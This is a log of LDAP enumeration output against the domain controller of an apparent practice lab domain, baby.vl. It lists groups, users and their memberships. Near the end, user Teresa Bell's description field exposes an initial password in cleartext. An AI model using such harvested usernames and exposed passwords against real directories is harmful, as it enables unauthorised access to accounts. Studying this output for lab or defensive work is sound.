LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121145159.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000417.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Domain Guests,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   Domain Guests
LDAP        10.129.20.55    389    BABYDC           description          All domain guests
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Domain Guests,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12351
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=Guests,CN=Builtin,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12353
LDAP        10.129.20.55    389    BABYDC           name                 Domain Guests
LDAP        10.129.20.55    389    BABYDC           objectGUID           edff1026-8342-a246-bae7-9bcc489d99c3
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-514
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Domain Guests
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       268435456
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483646
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           isCriticalSystemObject TRUE
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121145159.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000417.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Domain Users,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   Domain Users
LDAP        10.129.20.55    389    BABYDC           description          All domain users
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Domain Users,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12348
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=Users,CN=Builtin,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12350
LDAP        10.129.20.55    389    BABYDC           name                 Domain Users
LDAP        10.129.20.55    389    BABYDC           objectGUID           cab4d850-106d-9e4c-91ab-39be011a5b9e
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-513
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Domain Users
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       268435456
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483646
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           isCriticalSystemObject TRUE
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121145159.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000417.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   Enterprise Read-only Domain Controllers
LDAP        10.129.20.55    389    BABYDC           description          Members of this group are Read-Only Domain Controllers in the enterprise
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12429
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12431
LDAP        10.129.20.55    389    BABYDC           name                 Enterprise Read-only Domain Controllers
LDAP        10.129.20.55    389    BABYDC           objectGUID           55d70116-7efd-414e-a40b-510abb86961b
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-498
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Enterprise Read-only Domain Controllers
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       268435456
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483640
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           isCriticalSystemObject TRUE
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121145159.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000417.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   Group Policy Creator Owners
LDAP        10.129.20.55    389    BABYDC           description          Members in this group can modify group policy for the domain
LDAP        10.129.20.55    389    BABYDC           member               CN=Administrator,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12354
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12391
LDAP        10.129.20.55    389    BABYDC           name                 Group Policy Creator Owners
LDAP        10.129.20.55    389    BABYDC           objectGUID           5ba8abd0-8d33-214f-afa8-893badb23f09
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-520
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Group Policy Creator Owners
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       268435456
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483646
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           isCriticalSystemObject TRUE
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121145159.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000417.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Guest,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                person
LDAP        10.129.20.55    389    BABYDC                                organizationalPerson
LDAP        10.129.20.55    389    BABYDC                                user
LDAP        10.129.20.55    389    BABYDC           cn                   Guest
LDAP        10.129.20.55    389    BABYDC           description          Built-in account for guest access to the computer/domain
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Guest,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121144952.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121144952.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           8197
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=Guests,CN=Builtin,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           8197
LDAP        10.129.20.55    389    BABYDC           name                 Guest
LDAP        10.129.20.55    389    BABYDC           objectGUID           f174e124-e6b5-e044-b151-f2192f705df4
LDAP        10.129.20.55    389    BABYDC           userAccountControl   66082
LDAP        10.129.20.55    389    BABYDC           badPwdCount          0
LDAP        10.129.20.55    389    BABYDC           codePage             0
LDAP        10.129.20.55    389    BABYDC           countryCode          0
LDAP        10.129.20.55    389    BABYDC           badPasswordTime      0
LDAP        10.129.20.55    389    BABYDC           lastLogoff           0
LDAP        10.129.20.55    389    BABYDC           lastLogon            0
LDAP        10.129.20.55    389    BABYDC           pwdLastSet           0
LDAP        10.129.20.55    389    BABYDC           primaryGroupID       514
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-501
LDAP        10.129.20.55    389    BABYDC           accountExpires       9223372036854775807
LDAP        10.129.20.55    389    BABYDC           logonCount           0
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Guest
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       805306368
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           isCriticalSystemObject TRUE
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121145159.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000417.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                person
LDAP        10.129.20.55    389    BABYDC                                organizationalPerson
LDAP        10.129.20.55    389    BABYDC                                user
LDAP        10.129.20.55    389    BABYDC           cn                   Hugh George
LDAP        10.129.20.55    389    BABYDC           sn                   George
LDAP        10.129.20.55    389    BABYDC           givenName            Hugh
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121151103.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121151103.0Z
LDAP        10.129.20.55    389    BABYDC           displayName          Hugh George
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12813
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=dev,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12818
LDAP        10.129.20.55    389    BABYDC           name                 Hugh George
LDAP        10.129.20.55    389    BABYDC           objectGUID           93396f22-e9ba-784a-a884-7ab7070ad8a0
LDAP        10.129.20.55    389    BABYDC           userAccountControl   66080
LDAP        10.129.20.55    389    BABYDC           badPwdCount          0
LDAP        10.129.20.55    389    BABYDC           codePage             0
LDAP        10.129.20.55    389    BABYDC           countryCode          0
LDAP        10.129.20.55    389    BABYDC           badPasswordTime      0
LDAP        10.129.20.55    389    BABYDC           lastLogoff           0
LDAP        10.129.20.55    389    BABYDC           lastLogon            0
LDAP        10.129.20.55    389    BABYDC           pwdLastSet           132819810634363083
LDAP        10.129.20.55    389    BABYDC           primaryGroupID       513
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-1106
LDAP        10.129.20.55    389    BABYDC           accountExpires       9223372036854775807
LDAP        10.129.20.55    389    BABYDC           logonCount           0
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Hugh.George
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       805306368
LDAP        10.129.20.55    389    BABYDC           userPrincipalName    Hugh.George@baby.vl
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163014.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121162927.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000416.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=it,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   it
LDAP        10.129.20.55    389    BABYDC           member               CN=Caroline Robinson,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=it,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121151108.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20240727221156.0Z
LDAP        10.129.20.55    389    BABYDC           displayName          it
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12845
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=Remote Management Users,CN=Builtin,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           40986
LDAP        10.129.20.55    389    BABYDC           name                 it
LDAP        10.129.20.55    389    BABYDC           objectGUID           a9e7a710-6d75-d745-b650-269f8415b27c
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-1109
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       it
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       268435456
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483646
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000001.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                person
LDAP        10.129.20.55    389    BABYDC                                organizationalPerson
LDAP        10.129.20.55    389    BABYDC                                user
LDAP        10.129.20.55    389    BABYDC           cn                   Jacqueline Barnett
LDAP        10.129.20.55    389    BABYDC           sn                   Barnett
LDAP        10.129.20.55    389    BABYDC           givenName            Jacqueline
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121151103.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121151103.0Z
LDAP        10.129.20.55    389    BABYDC           displayName          Jacqueline Barnett
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12793
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=dev,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12798
LDAP        10.129.20.55    389    BABYDC           name                 Jacqueline Barnett
LDAP        10.129.20.55    389    BABYDC           objectGUID           fcb9bd7a-e707-2244-bd1a-bfa9c06aef1c
LDAP        10.129.20.55    389    BABYDC           userAccountControl   66080
LDAP        10.129.20.55    389    BABYDC           badPwdCount          0
LDAP        10.129.20.55    389    BABYDC           codePage             0
LDAP        10.129.20.55    389    BABYDC           countryCode          0
LDAP        10.129.20.55    389    BABYDC           badPasswordTime      0
LDAP        10.129.20.55    389    BABYDC           lastLogoff           0
LDAP        10.129.20.55    389    BABYDC           lastLogon            0
LDAP        10.129.20.55    389    BABYDC           pwdLastSet           132819810632000928
LDAP        10.129.20.55    389    BABYDC           primaryGroupID       513
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-1104
LDAP        10.129.20.55    389    BABYDC           accountExpires       9223372036854775807
LDAP        10.129.20.55    389    BABYDC           logonCount           0
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Jacqueline.Barnett
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       805306368
LDAP        10.129.20.55    389    BABYDC           userPrincipalName    Jacqueline.Barnett@baby.vl
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163014.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121162927.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000416.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                person
LDAP        10.129.20.55    389    BABYDC                                organizationalPerson
LDAP        10.129.20.55    389    BABYDC                                user
LDAP        10.129.20.55    389    BABYDC           cn                   Joseph Hughes
LDAP        10.129.20.55    389    BABYDC           sn                   Hughes
LDAP        10.129.20.55    389    BABYDC           givenName            Joseph
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121151108.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121151108.0Z
LDAP        10.129.20.55    389    BABYDC           displayName          Joseph Hughes
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12869
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=it,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12874
LDAP        10.129.20.55    389    BABYDC           name                 Joseph Hughes
LDAP        10.129.20.55    389    BABYDC           objectGUID           ae8d0e42-e958-d54f-8466-63528f5e5707
LDAP        10.129.20.55    389    BABYDC           userAccountControl   66080
LDAP        10.129.20.55    389    BABYDC           badPwdCount          0
LDAP        10.129.20.55    389    BABYDC           codePage             0
LDAP        10.129.20.55    389    BABYDC           countryCode          0
LDAP        10.129.20.55    389    BABYDC           badPasswordTime      0
LDAP        10.129.20.55    389    BABYDC           lastLogoff           0
LDAP        10.129.20.55    389    BABYDC           lastLogon            0
LDAP        10.129.20.55    389    BABYDC           pwdLastSet           132819810685992446
LDAP        10.129.20.55    389    BABYDC           primaryGroupID       513
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-1112
LDAP        10.129.20.55    389    BABYDC           accountExpires       9223372036854775807
LDAP        10.129.20.55    389    BABYDC           logonCount           0
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Joseph.Hughes
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       805306368
LDAP        10.129.20.55    389    BABYDC           userPrincipalName    Joseph.Hughes@baby.vl
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163014.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121162927.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000416.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                person
LDAP        10.129.20.55    389    BABYDC                                organizationalPerson
LDAP        10.129.20.55    389    BABYDC                                user
LDAP        10.129.20.55    389    BABYDC           cn                   Kerry Wilson
LDAP        10.129.20.55    389    BABYDC           sn                   Wilson
LDAP        10.129.20.55    389    BABYDC           givenName            Kerry
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121151108.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121151108.0Z
LDAP        10.129.20.55    389    BABYDC           displayName          Kerry Wilson
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12879
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=it,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12884
LDAP        10.129.20.55    389    BABYDC           name                 Kerry Wilson
LDAP        10.129.20.55    389    BABYDC           objectGUID           bd9dcde3-88f2-6a49-970a-572102271b6e
LDAP        10.129.20.55    389    BABYDC           userAccountControl   66080
LDAP        10.129.20.55    389    BABYDC           badPwdCount          0
LDAP        10.129.20.55    389    BABYDC           codePage             0
LDAP        10.129.20.55    389    BABYDC           countryCode          0
LDAP        10.129.20.55    389    BABYDC           badPasswordTime      0
LDAP        10.129.20.55    389    BABYDC           lastLogoff           0
LDAP        10.129.20.55    389    BABYDC           lastLogon            0
LDAP        10.129.20.55    389    BABYDC           pwdLastSet           132819810686929995
LDAP        10.129.20.55    389    BABYDC           primaryGroupID       513
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-1113
LDAP        10.129.20.55    389    BABYDC           accountExpires       9223372036854775807
LDAP        10.129.20.55    389    BABYDC           logonCount           0
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Kerry.Wilson
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       805306368
LDAP        10.129.20.55    389    BABYDC           userPrincipalName    Kerry.Wilson@baby.vl
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163014.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121162927.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000416.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                person
LDAP        10.129.20.55    389    BABYDC                                organizationalPerson
LDAP        10.129.20.55    389    BABYDC                                user
LDAP        10.129.20.55    389    BABYDC           cn                   Leonard Dyer
LDAP        10.129.20.55    389    BABYDC           sn                   Dyer
LDAP        10.129.20.55    389    BABYDC           givenName            Leonard
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121151103.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121151103.0Z
LDAP        10.129.20.55    389    BABYDC           displayName          Leonard Dyer
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12823
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=dev,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12828
LDAP        10.129.20.55    389    BABYDC           name                 Leonard Dyer
LDAP        10.129.20.55    389    BABYDC           objectGUID           5643109e-43e0-c341-8090-30a2abd2ce84
LDAP        10.129.20.55    389    BABYDC           userAccountControl   66080
LDAP        10.129.20.55    389    BABYDC           badPwdCount          0
LDAP        10.129.20.55    389    BABYDC           codePage             0
LDAP        10.129.20.55    389    BABYDC           countryCode          0
LDAP        10.129.20.55    389    BABYDC           badPasswordTime      0
LDAP        10.129.20.55    389    BABYDC           lastLogoff           0
LDAP        10.129.20.55    389    BABYDC           lastLogon            0
LDAP        10.129.20.55    389    BABYDC           pwdLastSet           132819810635678033
LDAP        10.129.20.55    389    BABYDC           primaryGroupID       513
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-1107
LDAP        10.129.20.55    389    BABYDC           accountExpires       9223372036854775807
LDAP        10.129.20.55    389    BABYDC           logonCount           0
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Leonard.Dyer
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       805306368
LDAP        10.129.20.55    389    BABYDC           userPrincipalName    Leonard.Dyer@baby.vl
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163014.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121162927.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000416.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Protected Users,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   Protected Users
LDAP        10.129.20.55    389    BABYDC           description          Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Protected Users,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12445
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12447
LDAP        10.129.20.55    389    BABYDC           name                 Protected Users
LDAP        10.129.20.55    389    BABYDC           objectGUID           1f4ffce3-829d-984c-9ffb-7ada56bab0eb
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-525
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Protected Users
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       268435456
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483646
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           isCriticalSystemObject TRUE
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121145159.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000417.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   RAS and IAS Servers
LDAP        10.129.20.55    389    BABYDC           description          Servers in this group can access remote access properties of users
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12357
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12359
LDAP        10.129.20.55    389    BABYDC           name                 RAS and IAS Servers
LDAP        10.129.20.55    389    BABYDC           objectGUID           c0171285-e1b6-3f4b-a24b-14cc04d04547
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-553
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       RAS and IAS Servers
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       536870912
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483644
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           isCriticalSystemObject TRUE
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121145159.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000417.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                person
LDAP        10.129.20.55    389    BABYDC                                organizationalPerson
LDAP        10.129.20.55    389    BABYDC                                user
LDAP        10.129.20.55    389    BABYDC           cn                   Teresa Bell
LDAP        10.129.20.55    389    BABYDC           sn                   Bell
LDAP        10.129.20.55    389    BABYDC           description          Set initial password to BabyStart123!
LDAP        10.129.20.55    389    BABYDC           givenName            Teresa
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121151108.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121151437.0Z
LDAP        10.129.20.55    389    BABYDC           displayName          Teresa Bell
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12889
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=it,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12905
LDAP        10.129.20.55    389    BABYDC           name                 Teresa Bell
LDAP        10.129.20.55    389    BABYDC           objectGUID           1031975b-8263-804a-bbf8-6bb21c1bb741
